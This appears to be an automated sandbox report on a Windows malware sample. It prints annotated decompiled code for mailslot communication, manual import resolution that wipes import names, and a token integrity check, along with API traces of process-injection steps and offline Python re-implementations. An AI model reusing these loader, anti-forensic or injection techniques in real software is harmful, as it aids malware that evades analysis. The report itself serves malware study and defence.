  • Opcode ID: 003b2913688191ea114162166813de589c119e69325853280e698207d87bc8a2
  • Instruction ID: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
  • Opcode Fuzzy Hash: DFF02E85425EC28BC77E20443911BE16086B782F42C6CC3B29ED2342AB8F40710A9746
  • Instruction Fuzzy Hash: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
C-Code - Quality: 94%
			E004010FB(void* __ebx, void* __edi, void* _a4) {
				struct _SECURITY_ATTRIBUTES* _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _v24;
				void* _t28;
				void* _t34;
				int _t39;
				long _t40;
				long _t43;
				void* _t45;
				long _t46;
				void* _t48;
				void* _t52;

				_t48 = __edi;
				_t45 = __ebx;
				_v8 = 0; // send offset
				// Open the mailslot for writing (GENERIC_WRITE, OPEN_EXISTING). ERROR_FILE_NOT_FOUND (2)
				// means the reader thread has not created it yet: sleep 100 ms and try again.
				do {
					_t28 = CreateFileA("\\\\.\\mailslot\\msl0", 0x40000000, 3, 0, 3, 0, 0); // executed
					_v20 = _t28;
					if(_t28 != 0xffffffff) {
						_v12 = 0;
					} else {
						_v12 = GetLastError();
						Sleep(0x64);
					}
				} while (_v12 == 2);
				if(_v12 != 0) {
					L19:
					return _v12;
				}
				// E0040171F (memcpy in its subcall) builds the buffer to send from the first field of the
				// shared context: pointer returned through _a4, length through _v24. 0 -> 0xb (ERROR_BAD_FORMAT).
				_t34 = E0040171F( *_a4,  &_a4,  &_v24); // executed
				if(_t34 == 0) {
					_v12 = 0xb;
					L18:
					CloseHandle(_v20);
					goto L19;
				}
				_t52 = _a4; // send buffer
				_push(_t45);
				_t46 = _v24; // bytes left to send
				_push(_t48);
				do {
					_v16 = _t46;
					if(_t46 >= 0x1000) {
						_v16 = 0x1000; // one mailslot message per WriteFile, at most 0x1000 bytes
					}
					_t39 = WriteFile(_v20, _v8 + _t52, _v16,  &_v16, 0); // executed
					if(_t39 == 0) {
						_t40 = GetLastError();
						_v12 = _t40;
						if(_t40 != 0x79) { // only ERROR_SEM_TIMEOUT is retried
							break;
						}
					} else {
						_t43 = _v16; // bytes written
						_v8 = _v8 + _t43;
						_t46 = _t46 - _t43;
						if(_t46 == 0 && _t43 == 0x1000) {
							// The last message was a full chunk: send its final byte once more as a
							// 1-byte message, so the reader sees the short message that ends its loop.
							_t46 = _t46 + 1;
							_v8 = _v8 - 1;
						}
					}
					Sleep(0x64); // executed
				} while (_t46 != 0);
				memset(_t52, 0, _v8); // zero the sent data before E00401207 frees it (HeapFree)
				E00401207(_t52);
				goto L18;
			}

APIs
  • CreateFileA.KERNEL32(\\.\mailslot\msl0,40000000,00000003,00000000,00000003,00000000,00000000), ref: 00401118
  • GetLastError.KERNEL32 ref: 00401126
  • Sleep.KERNEL32(00000064), ref: 00401131
    • Part of subcall function 0040171F: memcpy.NTDLL(?,?,?,?,?,00000000), ref: 00401806
  • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 0040118A
  • GetLastError.KERNEL32(?,?,00000002,?), ref: 004011A8
  • Sleep.KERNELBASE(00000064,?,?,00000002,?), ref: 004011B8
  • memset.NTDLL ref: 004011C8
    • Part of subcall function 00401207: HeapFree.KERNEL32(00000000,00401589,00401589), ref: 00401213
  • CloseHandle.KERNEL32(?), ref: 004011E4
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Similarity
  • Total matches: 182
  • API ID: HeapFreePathFindFileNameRegCloseKeyRegOpenKeyExRegQueryValueExRtlAllocateHeapStrStrIlstrcmpilstrlen
  • String ID:
  • API String ID: 1756712956-0
  • Opcode ID: f2f8398e5a378612a0451dc2799ca230d083f10daad558b8caa29df948c1a906
  • Instruction ID: 30042301f3adacd9a37cbdbd114ab521d6accad2819432d9e9ed4dab324ad14b
  • Opcode Fuzzy Hash: 73F027808E89B3CAC953D045D9CE7B64644BF90B5FC8C13A02480291551F6034EB3B5D
  • Instruction Fuzzy Hash: 30042301f3adacd9a37cbdbd114ab521d6accad2819432d9e9ed4dab324ad14b
APIs
  • PathFindFileNameW.SHLWAPI(002E618C), ref: 002E1246
  • lstrcmpiW.KERNEL32(00000000,?,002E7494), ref: 002E124D
  • RegOpenKeyExA.KERNEL32(80000001,002E8080,00000000,00000000,?,?,002E7494), ref: 002E127E
  • lstrlenW.KERNEL32(?,002E7494), ref: 002E1292
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 002E12AA
  • RegQueryValueExW.KERNEL32(?,00000000,002E7494,00000000,002E7494,?,002E7494), ref: 002E12C9
  • StrStrIW.SHLWAPI(00000000), ref: 002E12E4
  • HeapFree.KERNEL32(00000000,00000000), ref: 002E12F9
  • RegCloseKey.ADVAPI32(?,?,002E7494), ref: 002E1302
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 143
  • API ID: lstrlenmemset$GetProcAddressLoadLibrary
  • String ID: ~
  • API String ID: 3655391705-1707062198
  • Opcode ID: 23239c877e3e9023a5525b3a16ecfaaed23ea4db6e96668c4a9e8c62ae4ebe7f
  • Instruction ID: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11
  • Opcode Fuzzy Hash: EFF0590D195F71C6E16D6405187B7AA7082F39270BD14E9070193B31076880B3242F8C
  • Instruction Fuzzy Hash: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11
C-Code - Quality: 100%
			E00401389(void* __edi, intOrPtr _a4) {
				_Unknown_base(*)()* _v4;
				intOrPtr _v8;
				struct HINSTANCE__* _v12;
				signed int _v16;
				intOrPtr _t23;
				struct HINSTANCE__* _t24;
				intOrPtr _t27;
				intOrPtr _t28;
				_Unknown_base(*)()* _t29;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr _t35;
				void* _t42;
				CHAR* _t44;
				intOrPtr* _t46;
				CHAR* _t49;
				signed int* _t50;
				intOrPtr _t57;

				// Hand-rolled import resolution for an image mapped at __edi; _a4 points at its
				// IMAGE_NT_HEADERS (+0x80 = import directory RVA, +0x50 = SizeOfImage).
				_t42 = __edi; // image base
				_t50 =  &_v16;
				_v16 = _v16 & 0x00000000; // status: 0, 0x7e (ERROR_MOD_NOT_FOUND) or 0x7f (ERROR_PROC_NOT_FOUND)
				_t33 =  *((intOrPtr*)(_a4 + 0x80)); // import directory RVA
				if(_t33 == 0) {
					L23:
					return _v16;
				}
				_t34 = _t33 + __edi; // first IMAGE_IMPORT_DESCRIPTOR (0x14 bytes each)
				_t23 =  *((intOrPtr*)(_t34 + 0xc)); // Name RVA
				if(_t23 == 0) {
					goto L23;
				}
				while(1) {
					_t44 = _t23 + _t42;
					_t24 = LoadLibraryA(_t44); // executed
					_v12 = _t24;
					if(_t24 == 0) {
						break;
					}
					memset(_t44, 0, lstrlenA(_t44)); // zero the DLL name once it has been used
					_t27 =  *_t34; // OriginalFirstThunk (import name table)
					_t35 =  *((intOrPtr*)(_t34 + 0x10)); // FirstThunk (IAT)
					_t50 =  &(_t50[3]);
					if(_t27 != 0) {
						L6:
						_t46 = _t27 + _t42;
						_t28 =  *_t46;
						if(_t28 == 0) {
							L19:
							_t23 =  *((intOrPtr*)(_t34 + 0x20)); // Name RVA of the next descriptor
							_t34 = _t34 + 0x14;
							if(_t23 != 0) {
								continue;
							}
							L22:
							goto L23;
						}
						_v8 = _t35 - _t46 + _t42; // distance from a name-table entry to its IAT slot
						_t57 = _t28;
						L8:
						if(_t57 < 0) { // bit 31 set: import by ordinal
							if(_t28 < _t42 || _t28 >=  *((intOrPtr*)(_a4 + 0x50)) + _t42) { // outside [base, base + SizeOfImage)
								_t28 = 0;
							}
						} else {
							_t28 = _t28 + _t42; // IMAGE_IMPORT_BY_NAME
						}
						_t11 = _t28 + 2; // 0x2: skip the WORD Hint, leaving the function name
						_t49 = _t11;
						_t29 = GetProcAddress(_v12, _t49);
						_v4 = _t29;
						if(_t29 == 0) {
							goto L18;
						}
						if(_t49 >= 0) {
							memset(_t49, 0, lstrlenA(_t49)); // zero the function name as well
							_t50 =  &(_t50[3]);
						}
						 *(_v8 + _t46) = _v4; // store the resolved address in the IAT
						_t46 = _t46 + 4;
						_t28 =  *_t46;
						if(_t28 != 0) {
							goto L8;
						} else {
							goto L19;
						}
						L18:
						_v16 = 0x7f; // ERROR_PROC_NOT_FOUND is remembered; the next descriptor is still processed
						goto L19;
					}
					_t27 = _t35; // no name table: walk the IAT itself
					if(_t35 == 0) {
						goto L19;
					}
					goto L6;
				}
				_v16 = 0x7e; // ERROR_MOD_NOT_FOUND
				goto L22;
			}

APIs
  • LoadLibraryA.KERNEL32(?), ref: 004013B6
  • lstrlenA.KERNEL32(?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 004013C9
  • memset.NTDLL ref: 004013D3
  • GetProcAddress.KERNEL32(?,00000002,?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 0040141E
  • lstrlenA.KERNEL32(00000002,?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 00401431
  • memset.NTDLL ref: 0040143B
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
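E00401389 above resolves imports by hand for an image already mapped at __edi: it reads the import directory RVA at IMAGE_NT_HEADERS+0x80, walks the 0x14-byte IMAGE_IMPORT_DESCRIPTOR entries (OriginalFirstThunk at +0, Name at +0xC, FirstThunk at +0x10), loads each DLL, resolves each thunk (skipping the 2-byte Hint of IMAGE_IMPORT_BY_NAME), writes the address into the matching IAT slot, and zeroes every DLL and function name it has used. It returns 0x7e when LoadLibraryA fails and stops, and 0x7f when GetProcAddress fails, in which case it moves on to the next DLL. The Python below is an added re-implementation of that walk on a constructed flat image, not code from the sample or the report; it is there to make the control flow above concrete and to check the error and name-wiping behaviour offline. A dictionary with made-up addresses stands in for LoadLibraryA/GetProcAddress, and the ordinal branch, whose decompiled form above is hard to follow, is handled in the standard way (low 16 bits of the thunk), which is an assumption.

```python
import struct

IMAGE_ORDINAL_FLAG32 = 0x80000000
ERROR_MOD_NOT_FOUND = 0x7E     # listing: _v16 = 0x7e after LoadLibraryA fails
ERROR_PROC_NOT_FOUND = 0x7F    # listing: _v16 = 0x7f after GetProcAddress fails
DESC_SIZE = 0x14               # sizeof(IMAGE_IMPORT_DESCRIPTOR)


def u32(buf, off):
    return struct.unpack_from("<I", buf, off)[0]


def put32(buf, off, val):
    struct.pack_into("<I", buf, off, val)


def cstr(buf, off):
    return bytes(buf[off:buf.index(b"\0", off)]).decode("ascii")


def wipe(buf, off):
    """memset(name, 0, lstrlenA(name)), as the listing does after each successful lookup."""
    end = buf.index(b"\0", off)
    buf[off:end] = bytes(end - off)


def build_image(imports, nt_off=0x80, import_rva=0x200, size=0x800):
    """Constructed flat 32-bit image (RVA == offset): NT headers at nt_off with only SizeOfImage
    (+0x50) and the import directory RVA (+0x80) set, then the descriptor array, DLL names,
    IMAGE_IMPORT_BY_NAME entries and INT/IAT thunk arrays. imports = [(dll, [name|ordinal, ...])]."""
    img = bytearray(size)
    put32(img, nt_off + 0x50, size)
    put32(img, nt_off + 0x80, import_rva)
    cursor = import_rva + DESC_SIZE * (len(imports) + 1)   # room for the terminating null descriptor
    for i, (dll, entries) in enumerate(imports):
        desc = import_rva + i * DESC_SIZE
        name_rva = cursor
        img[cursor:cursor + len(dll)] = dll.encode("ascii")
        cursor += len(dll) + 1
        thunks = []
        for entry in entries:
            if isinstance(entry, int):
                thunks.append(IMAGE_ORDINAL_FLAG32 | entry)
            else:
                thunks.append(cursor)                      # RVA of IMAGE_IMPORT_BY_NAME
                img[cursor + 2:cursor + 2 + len(entry)] = entry.encode("ascii")
                cursor += 2 + len(entry) + 1               # WORD Hint + name + NUL
        cursor = (cursor + 3) & ~3
        oft = cursor                                       # OriginalFirstThunk (INT)
        for t in thunks:
            put32(img, cursor, t)
            cursor += 4
        cursor += 4                                        # INT terminator
        ft = cursor                                        # FirstThunk (IAT), same contents until resolved
        for t in thunks:
            put32(img, cursor, t)
            cursor += 4
        cursor += 4
        put32(img, desc, oft)
        put32(img, desc + 0x0C, name_rva)
        put32(img, desc + 0x10, ft)
    return img


def resolve_imports(img, nt_off, exports):
    """Walk the descriptors the way the listing does. exports replaces LoadLibraryA and
    GetProcAddress: {dll_name_lower: {function_name_or_ordinal: address}}."""
    status = 0
    desc = u32(img, nt_off + 0x80)
    if desc == 0:
        return status
    while True:
        name_rva = u32(img, desc + 0x0C)
        if name_rva == 0:                                  # end of the descriptor array
            return status
        table = exports.get(cstr(img, name_rva).lower())
        if table is None:                                  # LoadLibraryA failed: stop at once
            return ERROR_MOD_NOT_FOUND
        wipe(img, name_rva)
        src = u32(img, desc) or u32(img, desc + 0x10)      # prefer the INT, fall back to the IAT
        if src:
            delta = u32(img, desc + 0x10) - src            # _v8: INT entry -> IAT slot distance
            thunk_off = src
            while True:
                thunk = u32(img, thunk_off)
                if thunk == 0:
                    break
                by_ordinal = bool(thunk & IMAGE_ORDINAL_FLAG32)
                # Assumption: ordinal imports use the low 16 bits, as Windows defines them.
                key = thunk & 0xFFFF if by_ordinal else cstr(img, thunk + 2)
                addr = table.get(key)
                if addr is None:                           # GetProcAddress failed: note it, next DLL
                    status = ERROR_PROC_NOT_FOUND
                    break
                if not by_ordinal:
                    wipe(img, thunk + 2)
                put32(img, thunk_off + delta, addr)
                thunk_off += 4
        desc += DESC_SIZE


def read_iat(img, nt_off, index):
    """IAT contents of the index-th descriptor, for checking the result."""
    ft = u32(img, u32(img, nt_off + 0x80) + index * DESC_SIZE + 0x10)
    values = []
    while u32(img, ft):
        values.append(u32(img, ft))
        ft += 4
    return values


# Constructed export table with made-up addresses.
EXPORTS = {
    "kernel32.dll": {"CreateFileA": 0x7C801A28, "CloseHandle": 0x7C809BD7},
    "ntdll.dll": {16: 0x7C90E4F0},
}
```

After a successful run neither the DLL names nor the imported function names survive in the image, which is why a dump taken after this function has run yields an IAT full of addresses but no import strings to match them against.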
Similarity
  • Total matches: 204
  • API ID: GetTokenInformation$CloseHandleGetSidSubAuthorityGetSidSubAuthorityCountOpenProcessToken
  • String ID:
  • API String ID: 1755075983-0
  • Opcode ID: 12516916b99b4340f23e0e34973497135c3864d70b9c27df362c3fff36d6cf3a
  • Instruction ID: a037660959a659f5c3f904b5512dd759339b8539fa4e822d2db2cd3d0e1b79dd
  • Opcode Fuzzy Hash: 3EE02B810ECBC2DBA65F340445C0B6171E5FF20A05C8D1F605421AA1A65E3030677EAF
  • Instruction Fuzzy Hash: a037660959a659f5c3f904b5512dd759339b8539fa4e822d2db2cd3d0e1b79dd
APIs
  • OpenProcessToken.ADVAPI32(000000FF,00020008,002E7494,00000000), ref: 002E3F6C
  • GetTokenInformation.KERNELBASE(002E7494,00000014,00000001,00000004,?,00000000), ref: 002E3F8C
  • GetTokenInformation.KERNELBASE(002E7494,00000019,00000000,00000000,?), ref: 002E3F9C
  • CloseHandle.KERNEL32(002E7494), ref: 002E3FEC
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • GetTokenInformation.KERNELBASE(002E7494,00000019,00000000,?,?,?,002E618C), ref: 002E3FBF
  • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 002E3FC7
  • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 002E3FD7
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
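The block above queries the current process token: OpenProcessToken with TOKEN_QUERY | TOKEN_QUERY_SOURCE (0x20008), GetTokenInformation with class 0x14 (TokenElevation, a 4-byte TOKEN_ELEVATION) and class 0x19 (TokenIntegrityLevel, called once with a NULL buffer to learn the size and again after RtlAllocateHeap), then GetSidSubAuthorityCount and GetSidSubAuthority to read the label SID's last sub-authority, which is the mandatory-level RID. As an added example, not code from the sample or the report, the Python below builds and decodes such SIDs offline and performs the same RID classification; the SIDs and the elevation value are constructed.

```python
import struct

TOKEN_ELEVATION = 0x14                   # TOKEN_INFORMATION_CLASS values used in the listing
TOKEN_INTEGRITY_LEVEL = 0x19
SECURITY_MANDATORY_LABEL_AUTHORITY = 16  # identifier authority of S-1-16-* label SIDs

# Mandatory-level RIDs from winnt.h; a RID maps to the highest floor it reaches.
MANDATORY_LEVELS = [
    (0x5000, "protected process"), (0x4000, "system"), (0x3000, "high"),
    (0x2100, "medium plus"), (0x2000, "medium"), (0x1000, "low"), (0x0000, "untrusted"),
]


def build_sid(authority, sub_authorities):
    """Binary SID: Revision (1), SubAuthorityCount (1), IdentifierAuthority (6 bytes,
    big-endian), then one little-endian DWORD per sub-authority."""
    return (bytes([1, len(sub_authorities)]) + authority.to_bytes(6, "big")
            + struct.pack("<%dI" % len(sub_authorities), *sub_authorities))


def parse_sid(blob):
    """Return (authority, [sub-authorities]); raise ValueError on a malformed SID."""
    if len(blob) < 8 or blob[0] != 1:
        raise ValueError("unsupported SID revision")
    count = blob[1]
    if not 1 <= count <= 15 or len(blob) < 8 + 4 * count:
        raise ValueError("bad sub-authority count")
    authority = int.from_bytes(blob[2:8], "big")
    return authority, list(struct.unpack_from("<%dI" % count, blob, 8))


def sid_to_string(blob):
    authority, subs = parse_sid(blob)
    return "S-1-%d-%s" % (authority, "-".join(str(s) for s in subs))


def integrity_level(label_sid):
    """The listing's GetSidSubAuthorityCount / GetSidSubAuthority(count - 1) step: the last
    sub-authority of the label SID is the mandatory-level RID. None if not a label SID."""
    authority, subs = parse_sid(label_sid)
    if authority != SECURITY_MANDATORY_LABEL_AUTHORITY:
        return None
    rid = subs[-1]
    for floor, name in MANDATORY_LEVELS:
        if rid >= floor:
            return rid, name


def token_summary(elevation, label_sid):
    """elevation is the 4-byte TOKEN_ELEVATION that GetTokenInformation(TokenElevation)
    fills in; label_sid is the SID behind TOKEN_MANDATORY_LABEL.Label.Sid."""
    level = integrity_level(label_sid)
    if level is None:
        raise ValueError("not a mandatory-label SID: " + sid_to_string(label_sid))
    rid, name = level
    return {
        "elevated": bool(struct.unpack("<I", elevation)[0]),
        "integrity_rid": rid,
        "integrity": name,
        "label": sid_to_string(label_sid),
    }
```

A sample that branches on this result usually compares the RID against 0x2000 (medium) or 0x3000 (high); the tuple returned by integrity_level is what such a check would consume.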
Similarity
  • Total matches: 199
  • API ID: CloseHandleCreateThreadHeapCreateHeapDestroyInterlockedDecrementInterlockedIncrementSleepEx
  • String ID:
  • API String ID: 2400451634-0
  • Opcode ID: 20a1fe1949787535bd79f47ccd9ae32a5e8064993f8506e11f38a0a49419feba
  • Instruction ID: e3622a5643dd5bc20198795b8622ff9421b7fcc2ec09b542b244e7cafd184775
  • Opcode Fuzzy Hash: E2E02B881E4839C7857E180AD1DCF7102617FE1A5D9DC93511254561614F1DA0F77E8C
  • Instruction Fuzzy Hash: e3622a5643dd5bc20198795b8622ff9421b7fcc2ec09b542b244e7cafd184775
APIs
  • InterlockedIncrement.KERNEL32(002E7448), ref: 002E10B0
  • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 002E10C5
    • Part of subcall function 002E1000: memcpy.NTDLL(002E7570,?,0000000C,002E6248,0000000C,002E10E9,?,00000000,?), ref: 002E1038
  • CreateThread.KERNEL32(00000000,00000000,Function_0000005B,00000000,?,00000000), ref: 002E10F1
  • InterlockedDecrement.KERNEL32(002E7448), ref: 002E1109
  • SleepEx.KERNEL32(00000064,00000001), ref: 002E1125
  • CloseHandle.KERNEL32 ref: 002E1141
  • HeapDestroy.KERNEL32 ref: 002E114E
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 190
  • API ID: GetLastError$CloseHandleCreateMailslotHeapReAllocReadFileSleep
  • String ID: \\.\mailslot\msl0
  • API String ID: 2393858888-622273203
  • Opcode ID: a3ceb4dbf8eec70be79f35f386a0360ab8bfc7ba483ab19be25d62c214bd66f1
  • Instruction ID: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
  • Opcode Fuzzy Hash: 18E026820629C5C6567F100A28013B360CBBB7174BDDEE7600AA7391830F823017964A
  • Instruction Fuzzy Hash: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
C-Code - Quality: 96%
			E00401033(void* _a4) {
				signed int _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _t24;
				long _t25;
				void* _t27;
				int _t32;
				long _t33;
				void* _t34;
				void* _t36;
				long _t39;

				// Mailslot reader thread (E00401639 starts it at E00401034; this listing begins one byte
				// earlier). Collects messages into a heap buffer and returns it through the context _a4.
				_pop(_t41);
				_t39 = 0; // bytes received so far
				_v8 = 0x1000;
				// nMaxMessageSize 0x1000, lReadTimeout 0: ReadFile on an empty slot fails at once with ERROR_SEM_TIMEOUT (0x79).
				_t24 = CreateMailslotA("\\\\.\\mailslot\\msl0", 0x1000, 0, 0);
				_v16 = _t24; // mailslot handle; the rest of this listing reads it as _v20
				if(_t24 == 0) {
					_t25 = GetLastError();
					_t36 = _a4;
					_v8 = _t25;
				} else {
					_t36 = E004011F2(0x1000); // RtlAllocateHeap (see subcall below)
					if(_t36 == 0) {
						L10:
						_v8 = 8; // ERROR_NOT_ENOUGH_MEMORY
					} else {
						do {
							_t32 = ReadFile(_v20, _t36 + _t39, 0x1000,  &_v16, 0); // executed; one message per call
							if(_t32 == 0) {
								_t33 = GetLastError();
								_v8 = _t33;
								if(_t33 == 0x79) {
									_v16 = 0x1000; // nothing queued yet: keep the loop condition true and poll again
									goto L8;
								}
							} else {
								_v12 = _v12 + 0x1000; // buffer capacity (its initial value is not shown in this listing)
								_t39 = _t39 + _v16;
								_t34 = HeapReAlloc( *0x40305c, 0, _t36, _v12); // executed
								_t36 = _t34;
								if(_t36 == 0) {
									goto L10;
								} else {
									_v8 = _v8 & 0x00000000;
									goto L8;
								}
							}
							goto L11; // any other read error ends the transfer with that error code
							L8:
							Sleep(0x64); // executed
						} while (_v16 == 0x1000); // a message shorter than 0x1000 bytes ends the transfer
					}
					L11:
					CloseHandle(_v20);
				}
				if(_v8 == 0) {
					_t27 = _a4;
					 *(_t27 + 4) = _t36; // received buffer
					 *((intOrPtr*)(_t27 + 8)) = _t39; // received length
				}
				return _v8;
			}

APIs
  • CreateMailslotA.KERNEL32(\\.\mailslot\msl0,00001000,00000000,00000000), ref: 0040104F
  • GetLastError.KERNEL32 ref: 004010D6
    • Part of subcall function 004011F2: RtlAllocateHeap.NTDLL(00000000,00000000,00401543,00000208,00000000,?,004015FD,?,00000000,?,00000000,?,?,?,00000000), ref: 004011FE
  • ReadFile.KERNEL32(?,?,00001000,?,00000000), ref: 00401076
  • HeapReAlloc.KERNEL32(00000000,00000000,?), ref: 00401092
  • GetLastError.KERNEL32 ref: 004010A4
  • Sleep.KERNELBASE(00000064), ref: 004010B7
  • CloseHandle.KERNEL32(?), ref: 004010CE
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Similarity
  • Total matches: 194
  • API ID: GetLastError$CreateFileCreateFileMappingGetFileSizeMapViewOfFile
  • String ID:
  • API String ID: 1233022807-0
  • Opcode ID: 4e81c09fe99e8d89ea399b534ce1bd7a993d4de009fd61985864dbb219ec32a9
  • Instruction ID: 8c57d43649105a239ec27ab4fc75b28ccded34715bd5cff50f2d32245f2fdfca
  • Opcode Fuzzy Hash: A4D05E6E0C193ED1C1532416D8D6B2527027F6194EA4C1C322A8925217EFF471DFCB3D
  • Instruction Fuzzy Hash: 8c57d43649105a239ec27ab4fc75b28ccded34715bd5cff50f2d32245f2fdfca
APIs
  • CreateFileW.KERNEL32(002E74BC,80000000,00000001,00000000,00000003,00000000,00000000), ref: 002E1689
  • CreateFileMappingW.KERNELBASE(00000000,00000000,00000002,00000000,00000000,00000000,?,00000000,?,002E7494), ref: 002E169F
  • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,?,00000000,?,002E7494), ref: 002E16B7
  • GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,002E7494), ref: 002E16C9
  • GetLastError.KERNEL32(?,00000000,?,002E7494), ref: 002E16D7
  • GetLastError.KERNEL32(?,00000000,?,002E7494), ref: 002E16E4
  • GetLastError.KERNEL32(?,002E7494), ref: 002E16F3
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 307
  • API ID: ResumeThread$GetLastErrorSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 307323562-0
  • Opcode ID: c27f9509d813d6daf3205bb55a255c7f03bb055f708febb10643d95fc60cc1d5
  • Instruction ID: f1cfcadc64cec382ba735aa2127b2eee987ae4568dc6c5c5b5c389fb459ceaed
  • Opcode Fuzzy Hash: 6C017B4E066E93C6E9662240A651FB19381BF43A74E8E9B3642B1213DA5F54B00F970D
  • Instruction Fuzzy Hash: f1cfcadc64cec382ba735aa2127b2eee987ae4568dc6c5c5b5c389fb459ceaed
APIs
  • memset.NTDLL ref: 002E22F5
    • Part of subcall function 002E32C5: GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
    • Part of subcall function 002E32C5: GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
    • Part of subcall function 002E32C5: OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
    • Part of subcall function 002E32C5: IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
    • Part of subcall function 002E32C5: CloseHandle.KERNEL32(002E74A4), ref: 002E3331
    • Part of subcall function 002E3DE6: NtReadVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084), ref: 002E3E04
    • Part of subcall function 002E3DE6: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E13
    • Part of subcall function 002E3DE6: SetLastError.KERNEL32(00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E3E1A
  • ResumeThread.KERNELBASE(?), ref: 002E2418
    • Part of subcall function 002E1A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000040,00000000,00000000,00000000,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000,002E24C1), ref: 002E1A4D
    • Part of subcall function 002E1A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000000,00000000,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1), ref: 002E1A81
  • ResumeThread.KERNELBASE(?,00000000,002E24C1,CCCCFEEB,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E2380
  • WaitForSingleObject.KERNEL32(00000064), ref: 002E238E
  • SuspendThread.KERNELBASE(?), ref: 002E23A1
    • Part of subcall function 002E3DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3DDD
    • Part of subcall function 002E2175: memset.NTDLL ref: 002E21A3
    • Part of subcall function 002E2175: ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 002E222D
    • Part of subcall function 002E2175: WaitForSingleObject.KERNEL32(00000064), ref: 002E223B
    • Part of subcall function 002E2175: SuspendThread.KERNEL32(?), ref: 002E224E
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,?,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1DE0
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1E2F
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,002E24F9,00000800,?,?,?,00000000), ref: 002E1E9F
    • Part of subcall function 002E1CB2: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 002E1ECA
    • Part of subcall function 002E1CB2: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E1ED1
    • Part of subcall function 002E1CB2: CloseHandle.KERNEL32(00000000), ref: 002E1EE0
    • Part of subcall function 002E1CB2: memset.NTDLL ref: 002E1EF4
  • GetLastError.KERNEL32(00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E240D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 154
